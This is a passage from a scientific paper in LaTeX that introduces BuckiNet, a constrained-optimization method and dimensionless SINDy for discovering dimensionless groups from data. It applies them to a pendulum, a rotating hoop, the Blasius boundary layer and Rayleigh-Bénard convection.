In this case we know from basic mechanics that $\psi() \equiv \sin()$ for small $\alpha$, but for more complicated problems it may not be obvious what the appropriate $\bm \Phi$ and $\psi$ are.
This section introduces three methods to simultaneously identify the nondimensionalization $\bm \Phi$ and an approximation of $\psi$ from a set of experimental or simulation data.
In this data-driven context, \eqref{eq:ptopi-mat} can be combined with the nullspace constraint, $\bm D \bm \Phi = \mathbf{0}$, to optimize $\psi$ over a pre-defined hypothesis class given the measurement data.
\subsection{Constrained optimization}
\label{sec:constrained-opt}
Equation~\eqref{eq:optim-thrm} can be cast as a constrained optimization problem, with a fitting function $\psi$ that can be either parameter or non-parametric. The input Pi-groups powers matrix $\bm \Phi_p$ maps the input parameters/variables to the dimensionless groups through equation~\eqref{eq:ptopi-mat}, and the constraint of the optimization is given by equation~\eqref{eq:nulleqn}. The choice of the hypothesis class of $\psi$ is assumed to be arbitrary in this formulation, notwithstanding its effect on the accuracy of the results and the success of the method.
In this setup, we assume that the outputs, $\mathbf q$, can be non-dimensionalized by known constants of motion (i.e. $\bm \Pi_q$ is known). Accordingly, the resulting optimization problem is given by
\begin{equation}
\label{eq:constrained-opt}
\bm{\check{\Phi}_p} = \argmin_{\boldsymbol{\Phi}_p} \left\| \boldsymbol{\Pi}_q - \psi(\exp \left( \log(\boldsymbol{P}) \boldsymbol{\Phi}_p \right)) \right\|_2 + \lambda_1 \left\| \boldsymbol{\Phi}_p \right\|_1 + \lambda_2 \left\| \boldsymbol{\Phi}_p \right\|_2, \quad \text{s.t.} \quad \boldsymbol{D}_p \boldsymbol{\Phi}_p = \mathbf{0},
\end{equation}
where the $\ell_1$ regularization enforces sparsity (typical in dimensionless numbers) and the $\ell_2$ regularization encourages smaller powers.
An example application of this approach that uses kernel ridge regression as a non-parametric approximation of $\psi$ is given in Sec.~\ref{sec:results-blasius}.
\subsection{BuckiNet: non-dimensionalization with a neural network}
The unknown function $\psi$ is generally nonlinear and can be high dimensional. Given input-output data, in the absence of a governing equation, a deep neural network is a natural candidate for approximating $\psi$.
Equation~\eqref{eq:ptopi-mat} can be naturally integrated in a deep learning architecture by first applying a $\log()$ transform to the inputs $\mathbf p$, then using an exponential activation function at the output of the first layer. This makes $\mathbf \Phi_p$ the fitting weights of the first layer, as shown in Fig.~\ref{fig:neural-nondim}. We call this layer the BuckiNet.
When negative input data is given, it has to be pre-processed so that the initial $\log()$ operation becomes possible. In most cases, a simple shifting of the data to the positive domain is sufficient.
\begin{figure}[t]
\begin{center}
\includegraphics[width=\textwidth]{figures/buckinet.pdf}
\caption{Illustration of the BuckiNet layer for the rotating hoop problem (described in section~\ref{sec:rotating-hoop}). The dimensionless loss imposes a soft Buckingham Pi constraint from equation \eqref{eq:nulleqn}) and the BuckiNet layer satisfies equation \eqref{eq:ptopi}. In this example, the output is given by the three dominant time modes $\mathbf v$ of the output $x(t)$ rather than taking the time $t$ as an input.}
\label{fig:neural-nondim}
\end{center}
\end{figure}
This technique offers many advantages. First, the BuckiNet layer implicitly performs an unsupervised dimensionality reduction without any adjustment to the overall architecture of the deep network. This results in better generalization properties and a faster optimization thanks to a loss-less reduction in the number fitting parameters. The number of nodes in the first hidden layer is $n'$ as determined by the Buckingham Pi theorem. Second, the optimal weights of the first layer, $\bm \Phi_p$, correspond to the powers of dimensionless numbers that are most predictive of the solution. Third, the BuckiNet can be easily added to deep learning algorithms that fit input-output measurement data, with a few lines of code on Tensorflow or PyTorch.
The BuckiNet architecture on its own does not guarantee a dimensionless combination of the input parameters. Whether the network discovers a dimensionless basis without any constraint is discussed in Sec.\ref{sec:results-pendulum}. To explicitly account for the constraint in equation~\eqref{eq:nulleqn}, we add a null-space loss on $\bm \Phi_p$
\begin{equation}
\mathcal L_\text{null} = \left\| \bm D_p \bm \Phi_p \right\|^2_2,
\end{equation}
in the loss function. Therefore, the total loss is given by
\begin{equation}
\mathcal L = \left\| \boldsymbol{\Pi}_q - \psi(\exp \left( \log(\boldsymbol{P}) \boldsymbol{\Phi}_p \right)) \right\|_2 + \lambda \| \bm D_p \bm \Phi_p \|_2 + \text{reg}.
\end{equation}
In contrast to the constrained optimization problem proposed in the previous section, this method minimizes the null-space according to equation \eqref{eq:nulleqn} but does not satisfy it exactly. However, this proves to be sufficient for finding Pi-groups with sparse and approximately rational exponents as shown in Sec.\ref{sec:rotating-hoop}. The regularization term includes the $L_2$ loss $\| \bm \Phi_p \|_2$ that promotes dimensionless groups with lower powers, and the $L_1$ loss $\| \bm \Phi_p \|_1$ that promotes simple groups that have as little input variables/parameters as possible.
\subsection{Sparse identification of dimensionless equations}
\label{sec:methods-sindy}
The previous two methods addressed the problem of data-driven non-dimensionalization by simultaneously optimizing for the fitting function $\psi$ and the dimensionless groups $\bm \pi$.
In light of the fact that $\psi$ is usually the solution of a differential equation, we propose casting the problem as a sparse identification of differential equations (SINDy)~\cite{brunton2016discovering,rudy2017data} with candidate dimensionless groups as coefficients.
This constrains the dimensionless groups to be physically meaningful according to their associated differential operators that act on the unknown output variables, which is also the intuition often used in classical non-dimensionalization.
In the following formulation, we assume that the time $t$ is the only dependent variable, and non-dimensionalize it separately from the rest of the input parameters.
However, the method can be generalized to any number of dependent variables.
For a dimensionless quantity of interest $\boldsymbol{\pi}_q(t)$, our goal is to learn an equation of the form
\begin{equation}
\dv{\boldsymbol{\pi}_q}{t} \equiv \frac{1}{T} \dv{\boldsymbol{\pi}_q}{\tau} = \mathcal F(\boldsymbol{\pi}_q; \boldsymbol{\pi}_p),
\end{equation}
where $T$ is a characteristic time scale, $\tau = t/T$ is the corresponding dimensionless time, $\boldsymbol{\pi}_p$ is a vector of dimensionless parameters, and $\mathcal F$ is a differential operator.
In the absence of a governing equation, SINDy approximates $\mathcal F$ by a sum of differential operators with fitting coefficients that are optimized for both sparsity and prediction error~\cite{brunton2016discovering}. That is, given input-output pairs $\left\{ \bm \pi_p, \bm \pi_q \right\}$ sampled from a time series, SINDy minimizes the loss
\begin{equation}\label{eq:sindy-loss}
\mathcal L_\text{SINDy}(\bm \pi_q, \bm \pi_p, T ;\bm \Xi) = \left\| \frac{1}{T} \dv{\bm \pi_q}{\tau} - \bm \Theta\left(\bm \pi_q, \bm \pi_p ; T\right) \bm \Xi \right\|_2^2 + \lambda \left\| \bm \Xi \right\|_0,
\end{equation}
where $\bm \Xi$ contains unknown fitting coefficients and $\bm \Theta$ is a pre-determined library of potential candidate functions and differential operators, a linear combination of which makes up the approximation $\mathcal F = \bm \Theta\left(\bm \pi_q, \bm \pi_p\right) \bm \Xi$. For dimensional consistency, derivatives in the dependent variable $t$ are scaled by an unknown problem specific timescale $T$, which we assume can be expressed as a function of the input parameters: $T = T(\mathbf p)$.
In essence, the timescale $T$ is treated in the same manner as the dimensionless groups $\bm \pi$, except that its dimensions are constrained to be those of time.
Assuming that $\mathcal F(\boldsymbol{\pi}_q; \boldsymbol{\pi}_p)$, and its corresponding dictionary $\bm \Theta$, are \emph{separable}, we can write
\begin{equation}
\label{eq:sindy-ansatz}
\bm \Theta(\boldsymbol{\bm \pi}_q; \boldsymbol{\pi}_p, T) = \bm g(\bm \pi_p) \otimes \hat{\bm{\Theta}}(\boldsymbol{\pi}_q, T),
\end{equation}
where $\hat{\bm{\Theta}}$ is a dictionary of $s$ derivatives in the dimensionless quantity of interest $\bm \pi_q$, $\bm \pi_p$ is a vector of dimensionless input parameter excluding time, $\bm g()$ is a dictionary of polynomial functions, and $\otimes$ is the Kronecker product which is a vectorization of the outer product of two vectors.
The assumption of separability is not strictly necessary; candidate functions may be chosen that are functions of both $\bm \pi_p$ and $\bm \pi_q$.
However, SINDy libraries are often constructed as multinomials, so that the variables are separable.
Moreover, the parameters typically appear as coefficients of the state variable in both bifurcation normal forms and Taylor series approximations of dynamical systems, so the assumption of separability is natural.
The resulting feature space dimension is $\bm \Theta(\bm \pi_q; \bm \pi_p) \in {\mathbb R}^{ns}$.
Having $m$ measurements, we define the full dictionary has dimensions $\bm{\Theta} \in {\mathbb R}^{m\times ns}$, where every row is an examples (i.e. a sample in time) and every column a potential term in the differential equation. Accordingly, $\bm \Xi \in {\mathbb R}^{ns \times k'}$ where $k'$ is the dimension of $\bm \pi_q$.
While equation \eqref{eq:sindy-loss} takes dimensionless pairs as input data, we would also like to optimize over candidate non-dimensionalizations. That is, we would like to minimize the following loss function
\begin{equation}\label{eq:dimless-sindy-loss}
\mathcal L_\text{dSINDy}(\mathbf q, \mathbf p; \bm \Xi, \bm \Phi) = \mathcal L_\text{SINDy}\left( \bm \pi_p( \mathbf p; \bm \Phi), \bm \pi_q( \mathbf q; \bm \Phi), T(\mathbf p, \bm \Phi); \bm \Xi \right),
\end{equation}
where the input-output pairs $(\mathbf p, \mathbf q)$ are sampled from the dimensional data, and $\bm \Phi$ is the Pi-groups powers matrix that defines the mapping $\bm \pi(\mathbf x; \bm \Phi) = \exp(\log(\mathbf x) \bm \Phi )$ given by equation~\eqref{eq:ptopi-mat}.
Equation \eqref{eq:dimless-sindy-loss} does not include a constraint on ${\bm \Phi}$ (Eq.~\eqref{eq:nulleqn}) to ensure that $\bm \pi$ is dimensionless. To address this issue, we generate a finite number of candidate dimensionless numbers up to a predetermined fractional power that satisfy equation~\eqref{eq:nulleqn}. The resulting set of non-dimensionalizations correspond to a set of power matrices $\bm {\bar \Phi} = \{\bm {\bar \Phi}_1, \bm {\bar \Phi}_2, \ldots, \bm {\bar \Phi}_r\}$ over which we minimize the loss
\begin{equation}
\check{\bm{\Xi}}, \check{\bm{\Phi}} = \argmin_{\bm \Xi, i} \mathcal L_\text{dSINDy}(\mathbf p, \mathbf q; \bm \Xi, \bm{\bar \Phi}_i),
\end{equation}
with $i \in [1, r]$. $r$ depends on the range of predetermined powers from which dimensionless numbers are sampled according to the null-space condition in \eqref{eq:nulleqn}.
To avoid this ``brute-force`` search, the dimensionless SINDy method could be combined with the constrained optimization approach described in Sec.~\ref{sec:constrained-opt}.
In general, this tactic would be more flexible, since it also allows for non-integer powers in the dimensionless groups.
We use brute-force enumeration in this work because we expect integer powers, there are relatively few nullspace vectors, and the sparse regression problem can be solved efficiently, so this method scales relatively well in this particular case. We explore a more efficient approach in future work.
The general computational efficiency of the brute-force search approach will be discussed in the results.
In summary, this method solves two problems at once, providing
\begin{enumerate}
\item Dimensionless input parameters $\boldsymbol{\pi}_p$ and dimensionless dependent variables $\tau = t/T$.
\item A sparse and parametric dynamical system $\dot{\bm \pi}_q = \mathcal F(\bm \pi_q; \bm \pi_p)$.
\end{enumerate}
While we only consider time as a dependent variable in this section, a generalization to spatial and other dependent variables is straightforward. The method also allows for combining known dimensionless numbers with unknown ones as often encountered in practical problems.
\newpage
\section{Results}
In this section, we apply the three methods presented above on four non-dimensionalization problems: the harmonic oscillator in Sec.~\ref{sec:results-pendulum}, the bead on a rotating hoop in Sec.~\ref{sec:rotating-hoop}, the Blasius boundary layer in Sec.~\ref{sec:results-blasius}, and the Rayleigh-B\'enard problem in Sec.~\ref{sec:rayleigh-benard} . We discuss the advantages and shortcomings of each method in terms of accuracy, robustness, and speed in the context of our proposed hypothesis.
\subsection{Non-dimensionalization as optimal change of variables: harmonic oscillator}
\label{sec:results-pendulum}
Dimensionless groups can act as scaling parameters (i.e. revealing self-similarity), as they often arise in analytical solutions. In some problems, Pi-groups can be deduced from an optimal change of variables without the need for a Buckingham Pi constraint. While this is not always the case, it supports the hypothesis that an optimal mapping between input and output data gives rise to a physically meaningful change of variables. We demonstrate this point on the simple pendulum problem described in Sec.\ref{sec:methods} and shown in Fig.~\ref{fig:approaches}.
We evaluate the output prediction, $\alpha$, at 100 parameter combinations of the inputs $L$, $m$ and $g$ sampled from a uniform distribution, and at 100 time steps, $t$. In this problem, we employ the BuckiNet architecture \emph{without the Buckingham Pi constraint} (i.e. without $\mathcal L_\text{null}$) with four inputs $[L, m, g, t]$, one perceptron in the first hidden layer, a dimensionless output $\alpha$, 3 layers with 8 perceptrons each for $\psi$, and an exponential linear unit (ELU) activation function. The resulting dimensionless group in the BuckiNet layer is
\begin{equation}
\pi_p = \frac{gt^2}{L},
\end{equation}
which appears in the solution of the linear approximation of a harmonic oscillator as
\begin{equation}
\alpha(t) = \alpha_0\cos(\sqrt{\pi_p} + \theta),
\end{equation}
where $\theta$ is a constant that depends on the initial condition. This is a case where a change of variables that gives the simplest analytical solution is dimensionless. However, this is not generally the case, especially in higher dimensional problems. To fully take advantage of the Buckingham Pi constraint, we apply the three methods proposed in Sec.\ref{sec:methods} in the following examples.
\subsection{Bead on a rotating hoop}
\label{sec:rotating-hoop}
Consider a wire hoop with radius $R$, rotating about a vertical axis coinciding with its diameter at an angular velocity $\omega$, as shown in Fig.~\ref{fig:neural-nondim}. A bead with mass $m$ slides along the wire with tangential damping coefficient $b$. The equation governing the dynamics of the angular position $x$ of the bead with respect to the vertical axis is given by (\cite{strogatz2018nonlinear} sec. 3.5)
\begin{equation}\label{eq:rothoop}
m R \ddot{x} = -b \dot{x} - m g \sin x + m R^2 \omega \sin x \cos x.
\end{equation}
A traditional dimensional analysis leads to the following Pi-groups~\cite{strogatz2018nonlinear}
\begin{equation}
\label{eq:hoop-numbers}
\gamma = \frac{R \omega^2}{g}, \hspace{2cm} \epsilon = \frac{m^2 g R}{b^2}, \hspace{2cm} \tau = \frac{mg}{b} t,
\end{equation}
where $\epsilon$ controls the inertial term and $\gamma$ is a pitchfork bifurcation parameter that accounts for two additional fixed points at $x^* = \pm \arccos(\gamma)$, for $\gamma > 1$.
Non-dimensionlizing equation \eqref{eq:rothoop} gives
\begin{equation}
\label{eq:hoop-nondim}
\epsilon \frac{d^2 x}{d \tau^2} = - \frac{d x}{d \tau} - \sin x + \gamma \sin x \cos x.
\end{equation}
For $\epsilon \ll 1$ and $\gamma = \mathcal{O}(1)$, the system is overdamped and approximately first-order.
\begin{table}[b]
\begin{center}
\begin{tabular}{ |c||c|c|c|c|c|}
\hline
$\bm \Phi$ & $m$ & $R$ & $b$ & $g$ & $\omega$ \\
\hline
$\phi(\pi_1)$ & 0.0011 & 1.000 & 0.0001 & -0.997 & 1.990\\
$\phi(\pi_2)$ & 1.991 & 1.000 & -1.990 & 0.998 & 0.002 \\
\hline
\end{tabular}
\captionof{table}{Discovered Pi-groups powers with BuckiNet.}
\label{tab:buckinet-hoop-result}
\end{center}
\end{table}
To test the BuckiNet and the constrained optimization algorithms, we solve the governing equations numerically to obtain 3000 solutions with mass, radius, damping coefficient, and angular velocity sampled from a uniform distribution. In order to recover $\gamma$ and $\epsilon$ without explicitly accounting for the time scale, we use the Principal Component Analysis of time series solution matrix (where each row corresponds to a different parameter combination, and each column to a different time sample), so that the output $\bm \pi_q$ is the set of coefficients for the leading $r$ principal components as shown in Fig.~\ref{fig:neural-nondim}. Here $\bm \pi_q \equiv \mathbf q = x$ because the angle $x$ is dimensionless. A sample of the time-series solutions for different parameters is shown in Fig.~\ref{fig:sindy-hoop}.
\begin{figure}[t]
\begin{center}
\includegraphics[width=\linewidth]{figures/sindy_hoop.pdf}
\caption{Dimensionless SINDy applied on the rotating hoop problem. The discovered SINDy model reproduces the data and identifies the most physically relevant dimensionless groups.}
\label{fig:sindy-hoop}
\end{center}
\end{figure}
After optimizing over neural network hyperparameters -- given the optimal architecture, with enough modes to represent the solution -- BuckiNet recovers the correct dimensionless numbers shown in table \ref{tab:buckinet-hoop-result}. The discovered Pi-groups are scaled to make the power of $R$ unity.
In order to understand the limitations of the method, it is informative to look at sub-optimal solutions. For instance, for some hyperparameters (e.g. network architecture, regularization etc.) BuckiNet and the constrained optimization method give a product of either $\epsilon$ or $\gamma$ and a Pi-group that is closely related to $\tau$ as a solution, such that
\begin{equation}
\phi(\pi_1) = \phi(\pi_2) + c \phi\left(\frac{mg}{\omega b}\right),
\end{equation}
where $c$ is an arbitrary constant, and $mg/(\omega b)$ is the closest approximation of $\tau=mgt/ b$, given that $t$ is not included as an input. This shows that a product of multiple Pi-groups is a local minimum that satisfies the Buckingham Pi and spans the solution space in a different coordinate system. However, a hyperparameter optimization over multiple trials will consistently result in Pi-groups that closely approximate $\gamma$ and $\epsilon$. This motivates the use of SINDy to further constrain the dimensionless numbers to be coefficients in a differential equation where they acquire a concrete mathematical meaning as controllers of the dominant balance.
Using the dimensionless SINDy approach, we generate 20 parameter combinations, sampled from a uniform distribution -- in this case, accounting for the time $t$ as an input. The library $\bm \Theta$ contains low-order polynomials in $x$ and $\dot{x}$ that can approximate the trigonometric nonlinearity in~\eqref{eq:rothoop} for relatively small values of $x$.
For each candidate nondimensionalization generated from the nullspace of $\bm D$, the nonconvex optimization problem~\eqref{eq:sindy-loss} is approximated with the simple sequentially thresholded least squares algorithm~\cite{brunton2016discovering}, where the only tuning parameter is a threshold that approximates the $\ell_0$ regularization loss.
\begin{figure}[t]
\vspace{-.35in}
\begin{center}
\includegraphics[width=.99\linewidth]{figures/sindy-dimensionless.pdf}
\vspace{-.1in}
\caption{The dimensionless SINDy approach applied on the rotating hoop problem. i) generate candidate dimensionless numbers and time scales from the nullspace of the input powers matrix $\bm D_p$, ii) choose a combination of Pi-groups and a time scale, iii) cast as a SINDy problem with the chosen Pi-groups as coefficients, iv) choose the combination with the lowest SINDy loss.}
\label{fig:summary-figure}
\end{center}
\end{figure}
Fig.~\ref{fig:summary-figure} shows that the method identifies the same time scale $T = b/mg$ as that proposed by Strogatz~\cite{strogatz2018nonlinear} in equation~\eqref{eq:hoop-numbers}, along with ratios of $\epsilon$ and $\gamma$ which is consistent with equation~\eqref{eq:hoop-nondim} -- divided by $\epsilon$ -- such that
\begin{equation}
\pi_1 = \frac{b^2}{R g m^2} = \frac{1}{\epsilon}, \hspace{2cm} \pi_2 = \frac{\omega^2 g^2}{m^2 g^2} = \frac{\gamma}{\epsilon}.
\end{equation}
Depending on the sparsity threshold in SINDy, models of varying fidelity can be identified.
For example, with a threshold of $10^{-1}$ the algorithm selects a cubic model
\begin{equation}
\dv[2]{x}{\tau} = -0.96 \pi_1 \dv{x}{\tau} - 0.94 \pi_1 x + \pi_2 (0.86x - 0.34x^3),
\end{equation}
while reducing the threshold to $10^{-3}$ results in the seventh-order model
\begin{equation}
\dv[2]{x}{\tau} = - \pi_1 \dv{x}{\tau} -\pi_1(x - 0.16 x^3 + 0.01x^5) + \pi_2( x - 0.66 x^3 + 0.13 x^5 - 0.01 x^7).
\end{equation}
This closely matches the Taylor-series approximation of the true dynamics~\eqref{eq:hoop-nondim}.
Accordingly, an appropriate model can be selected based on a desired tradeoff between accuracy and simplicity. However, higher order models increase the accuracy of the discovered dimensionless groups.
Fig.~\ref{fig:sindy-hoop} tests the generalization of the two models on a set of parameters chosen to be outside the range of the training data (i.e. an extrapolation task).
Although the cubic model captures the qualitative behavior reasonably well, the seventh-order approximation closely tracks the true solution.
\subsection{Laminar boundary layer: identifying self-similarity}
\label{sec:results-blasius}
Non-dimensionalization often arises in the context of scaling and collapsing experimental results to lower dimensions by revealing the self-similarity structure of the solution space.
The discovery of self-similarity is considered an important result in many applications because it reveals universality properties.
There are plenty of such examples in the history of fluid dynamics, particularly in understanding turbulence~\cite{barenblatt1996scaling, Pope2000book}.
Boundary layer theory is an example where of nondimensionalization and self-similarity have played a central role in this understanding~\cite{Schlichting1955}.
Using scaling analysis, Prandtl showed that the Navier-Stokes equation describing an incompressible laminar boundary layer flow can be simplified to the \textit{boundary layer equations} in the streamfunction $\Psi$
\begin{equation}
\label{eq:boundary-layer-equations}
\Psi_y \Psi_{xy} - \Psi_x \Psi_{yy} = \nu \Psi_{yyy},
\end{equation}
where the subscripts denote partial differentiation in $x$ and $y$, $\nu$ is the kinematic viscosity (with units of $L^2/T$). $\Psi$ is defined so that the streamwise and wall normal velocities are respectively given by
\begin{equation}
u(x, y) = \Psi_y, \qquad v(x, y) = -\Psi_x.
\end{equation}
Although Prandtl's boundary layer equations are themselves a significant simplification and triumph of scaling analysis, they can be further simplified and expressed as an ordinary differential equation with the help of self-similarity.
Blasius took the scaling one step further by showing that if $\Psi(x, y)$ is a solution of~\eqref{eq:boundary-layer-equations}, then so is $\tilde{\Psi}(x, y) = \alpha \Psi(\alpha^2 x, \alpha y) $ for any dimensionless constant $\alpha$.
This in turn implies that $\Psi$ itself is not an independent function of $x$ and $y$, but of the combination $x/\sqrt{y}$.
Defining the dimensionless similarity variable $\eta$ and streamfunction $f = f(\eta)$ as
\begin{equation}
\eta = y \sqrt{\frac{U_\infty}{\nu x} }, \qquad f(\eta) = \frac{\Psi(x, y)}{\sqrt{\nu U_\infty x}},
\end{equation}
with freestream velocity $U_\infty$, the boundary layer equations reduce to the nonlinear boundary value problem
\begin{subequations}
\label{eq:blasius-bvp}
\begin{gather}
f'''(\eta) + \frac{1}{2}f''(\eta) f(\eta) = 0,\\
f(0) = f'(0) = 0, f'(\infty) = 1.
\end{gather}
\end{subequations}
Although there is no known closed-form solution to this problem, it can be analyzed with asymptotic perturbation methods or solved numerically (e.g. with a shooting method to identify an appropriate initial value for $f''(0)$).
\begin{figure}[t]
\begin{center}
\includegraphics[width=16cm]{figures/krr_blasius.pdf}
\caption{Constrained optimization method for Blasius boundary layer problem, identifying the dimensionless group that collapses the input-output map to a single curve.}
\label{fig:krr-blasius}
\end{center}
\end{figure}
In contrast to the rotating hoop example, in this case the velocity profile is more important than the differential equation itself.
For instance, once the Blasius solution $f(\eta)$ is known, the boundary layer profile can be found by undoing the scaling, e.g. $u(x, y) = U_\infty f'(\eta)$.
The most natural method to directly identify a dimensionless group associated with the boundary layer is therefore the constrained optimization approach introduced in Sec.~\ref{sec:constrained-opt}.
Defining the output quantity of interest as the nondimensional streamwise velocity $\pi_q = u/U_\infty$, the problem is to learn a model for $\pi_q = \psi(\pi_p)$, where $\pi_p$ is an input dimensionless group that can depend on $x, y, U_\infty$, and $\nu$.
In this problem we seek to rediscover the Blasius scaling which was discovered analytically by Blasius and Prandtl with $\pi_p = \eta$ and $\psi = f'(\eta)$.
We use kernel ridge regression (KRR) with a non-parametric radial basis function to approximate $\psi$.
Accordingly, the constrained optimization~\eqref{eq:constrained-opt} must learn a dimensionless group $\pi_p$ in the nullspace of the units matrix $\bm D$ that leads to a good KRR approximation of $\pi_q$ as a function of $\pi_q$.
We generate data for this example by solving the boundary layer equations~\eqref{eq:boundary-layer-equations} via a shooting method applied to~\eqref{eq:blasius-bvp}.
The free-stream velocity is chosen to be $U_\infty = 0.01 m/s$ with viscosity $\nu = 10^{-6} m^2/s$, close to that of water at room temperature.
The resulting two-dimensional profile $u(x, y)$ is shown in Fig.~\ref{fig:krr-blasius} (top), along with profiles at selected locations of $x$.
100 points in this field are selected randomly as training data and~\eqref{eq:constrained-opt} is solved with a constrained trust region method implemented in Scipy.
Specifically, for each candidate nondimensionalization, the kernel ridge regression model with radial basis function kernels (implemented in scikit-learn) is trained and evaluated on the dimensionless parameters computed from the 100 test points.
The KRR model uses ridge ($\ell_2$) penalty of $10^{-4}$, an $\ell_1$ penalty of $10^{-4}$, and a scale factor of $1$.
Note that in this method, generalizing on a test case is not crucial because the model is not used to make prediction but only as a proxy for the mutual information between the candidate nondimensionalization and the quantity of interest. In other words, the method does not have to address problems of overfitting.
Moreover, since only 100 points are used in training, the performance of the final model can be evaluated against the entire field ($10^4$ points).
The optimization problem is inexpensive but non-convex and sensitive to the initial guess, thus problem to converging to local minima. To address this issue, we run multiple optimizations with different initial guesses (around 20) and return the solution that has the minimum cost.
Fig.~\ref{fig:krr-blasius} compares the discovered nondimensionalization, $y^{0.46} U_\infty^{0.24}/(x^{0.22} \nu^{0.24}) \approx \sqrt{\eta}$, to the Blasius solution. When scaled to make the power of $y$ unity, the discovered dimensionless number is
\begin{equation}
\label{eq:blasius-result}
\pi_p = \frac{y U_\infty^{0.51}}{x^{0.49} \nu^{0.51}} \approx \eta.
\end{equation}
The constrained optimization learns a different but equivalent model, in the sense that $\psi(\pi_p)$ is one-to-one with $f'(\eta)$.
In contrast to the brute force-type search over candidate nondimensionalizations generated from a search over vectors of integers, the exponents in this method are floating-point numbers and are arbitrary up to an overall constant.
The scale of the solution is therefore a balance between the $\ell_1$ and $\ell_2$ penalties and the scale factor in the radial basis functions. Setting the scale equal to one with small penalties thus biases the algorithm towards $\mathcal{O}(1)$ exponents.
\subsection{Rayleigh-B\'enard convection: learning a normal form}
\label{sec:rayleigh-benard}
Characterizing the onset and behavior of instabilities is crucial for understanding large-scale dynamical systems.
Near a critical point, a reduced-order amplitude equation called the normal form can model the qualitative change in dynamics associated with a bifurcation.
Although the normal form can be deduced analytically~\cite{GuckenheimerHolmes}, numerically~\cite{Meliga2009jfm, Carini2015jfm}, or via symmetry arguments~\cite{Golubitsky1988}, these methods become progressively more challenging with more complex systems.
With the exception of the symmetry analysis, they are also invasive because they require direct access to the (discretized) governing equations.
In this example, we use the SINDy method introduced in Sec.~\ref{sec:methods-sindy} to learn a dimensionless normal form from limited time-series data, along with the corresponding dimensional parameters.
Rayleigh-B\'enard convection is a prototypical example of a system with a global instability that has been used in a range of studies of nonequilibrium dynamics, including pattern formation~\cite{Cross1993}, chaos~\cite{Lorenz1963jas}, and coherent structures in turbulence~\cite{Pandey2018ncomms}.
The system typically consists of a Boussinesq fluid between two plates, where the lower plate is at a higher temperature than the upper plate.
Heat transfer can take place via either conduction or convection, whose relative strength is encapsulated in the dimensionless Rayleigh number.
Below a critical Rayleigh number, the only stable solution is steady conduction between the plates; above it, the density gradient becomes unstable to convection, as shown in the lower panels of Fig.~\ref{fig:sindy-RB}.
\begin{figure}[t]
\begin{center}
\includegraphics[width=0.85\linewidth]{figures/sindy_RB.pdf}
\caption{The dimensionless SINDy method discovers the normal form of Rayleigh-B\'enard convection problem with the analytical form of the Rayleigh as a cofficient.}
\label{fig:sindy-RB}
\end{center}
\end{figure}
For a fluid in the Boussinesq approximation linearized about density $\rho_0$ and temperature $T_0$, the governing equations consist of the conservation of momentum, mass, and energy:
\begin{subequations}
\begin{align}
&\pdv{\mathbf{u}}{t} + (\mathbf{u} \cdot \nabla ) \mathbf{u} = -\rho_0^{-1} \nabla p + \nu \nabla^2 \mathbf{u} - g \alpha (T - T_0) \\
&\nabla \cdot \mathbf{u} = 0 \\
&\pdv{T}{t} + (\mathbf{u} \cdot \nabla) T = \kappa \nabla^2 T,
\end{align}
\end{subequations}
along with the boundary conditions that $T(z=0) = T_0$, $T(z=L_z) = T_0 + \Delta T$.
Besides the primitive variables, the system includes gravity $g$, coefficient of thermal expansion $\alpha$, kinematic viscosity $\nu$, and thermal diffusivity $\kappa$.
The flow is typically analyzed in terms of the Rayleigh number $\mathrm{Ra}=g\alpha \Delta T L_z^3 / \nu \kappa$ and Prandtl number $\mathrm{Pr}=\nu/\kappa$.
Although the Prandtl number has a significant impact on the behavior of the flow above the threshold of instability~\cite{Pandey2018ncomms}, the onset of instability itself is not sensitive to the Prandtl number~\cite{Chandrasekhar1961}.
We simulate the nondimensional flow in two dimensions with no-slip boundary conditions on the wall and periodic boundary conditions in the wall-parallel ($x$) direction using the Shenfun spectral Galerkin library~\cite{mortensen2018joss}.
We use a Fourier-Chebyshev discretization with $(N_x, N_z)=(256, 100)$ and choose $L_x = 2\pi L_z$.
The critical point in this simulation is at $\mathrm{Ra}_c \approx 1875$, significantly above the true value of $\mathrm{Ra}_c \approx 1708$.
This is likely due to differences in boundary conditions, wall-parallel domain extent, and the restriction to two dimensions.
We simulate the system at a range of Rayleigh numbers (shown in Fig.~\ref{fig:sindy-RB}) and $\mathrm{Pr}=0.7$.
For each simulation, we dimensionalize the data as follows.
We randomly select a value for $\kappa$ in the range $(0.5, 0.7) \mathrm{m}^2/\mathrm{s}$, $\Delta T$ in the range $(50, 80)~^\circ\mathrm{C} $, and $\alpha$ in the range $(1 \times 10^{-4}, 5 \times 10^{4}) \mathrm{m}/^{\circ}\mathrm{C}$.
The separation $L_z$ is then computed for consistency with the simulation Rayleigh number, with $g = 9.8 \mathrm{m}/\mathrm{s}^2$.
Likewise, $\nu$ is computed for consistency with the Prandtl number.
Finally, time is dimensionalized based on a free-fall time scale $\sqrt{L_z/g\alpha \Delta T}$.
From eight initial simulation cases, we retain five points close to the bifurcation (black dots in Fig.~\ref{fig:sindy-RB}) to solve the dimensionless SINDy problem and withold the other three points (red crosses) as test data.
One option for learning a model of the flow near the critical point would be to input the spatiotemporally varying data and learn a PDE model~\cite{rudy2017data}.
This might yield something similar to a Ginzburg-Landau or Swift-Hohenberg model~\cite{Cross1993}.
Another approach is to approximate some quantity of interest with a linear modal decomposition such as proper orthogonal decomposition and fit an ODE model of the temporal coefficients~\cite{Loiseau2017jfm}.
Given the simple globally coherent spatial structure of the flow, we proceed with the latter.
To account for translational invariance, we first represent the temperature field with a Fourier series in the $x$-direction:
\begin{equation}
T(x, z, t) = \sum_k \hat{T}_k(z, t) e^{ikx}.
\end{equation}
Recognizing that the weakly supercritical solution has only $k=\pm 2$ Fourier components (see Fig.~\ref{fig:sindy-RB}), we define a real-valued observable as the wall-normal integral of the negative temperature gradient (proportional to heat flux) at $k=2$:
\begin{equation}
q(t) = \left| \int_0^{L_z} -ik \hat{T}_2(z, t) \dd z \right|.
\end{equation}
Note that this choice is arbitrary; we could for instance model the coefficient of a particular Fourier-Chebyshev basis function, or that of a leading POD mode.
All would illustrate qualitatively similar behavior, but this definition of $q(t)$ is a simple and representative global observable.
We set up the dimensionless SINDy problem as described in Secs.~\ref{sec:methods-sindy}.
Since we expect a Landau-type dynamics model for the symmetry-breaking behavior, we choose a linear-cubic polynomial library in $q$ and search for one dimensionless group $\pi_p$, along with an appropriate dimensionless time $\tau$.
Since there are only six independent dimensional quantities in this problem $(H, g, \alpha, \Delta T, \nu, \kappa)$, it is inexpensive to perform the optimization over all dimensionless numbers composed of integer powers up to $\pm 2$.
